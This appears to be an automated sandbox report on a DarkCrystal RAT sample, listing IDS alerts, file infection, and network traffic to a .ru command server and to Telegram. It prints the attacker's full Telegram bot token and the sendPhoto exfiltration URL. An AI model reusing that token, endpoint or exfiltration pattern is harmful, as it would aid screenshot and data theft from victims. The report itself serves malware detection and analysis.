                              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.pdb source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.00000000031CB000.00000004.00000800.00020000.00000000.sdmp

                              Spreading

                              barindex
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 104.21.95.93:80
                              Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.4:49751 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.4:49733 -> 149.154.167.220:443
                              Uses ping.exe to check the status of other devices and networks
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Uses the Telegram API (likely for C&C communication)
                              Source: unknownDNS query: name: api.telegram.org
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: POST /bot7770813070:AAGqpOsmZAapb-pBsZQmM7BGLhdVdYw-7FQ/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="313b427a-59e5-4849-a91a-75e00f68a976"Host: api.telegram.orgContent-Length: 82628Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: POST /bot7770813070:AAGqpOsmZAapb-pBsZQmM7BGLhdVdYw-7FQ/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="d905710a-4bb7-429f-999a-55dcd7e3e939"Host: api.telegram.orgContent-Length: 84854Expect: 100-continueConnection: Keep-Alive
                              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                              Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                              Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                              Source: unknownDNS query: name: ipinfo.io
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 34.117.59.81:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 34.117.59.81:443
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 336Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1828Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 142536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1836Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
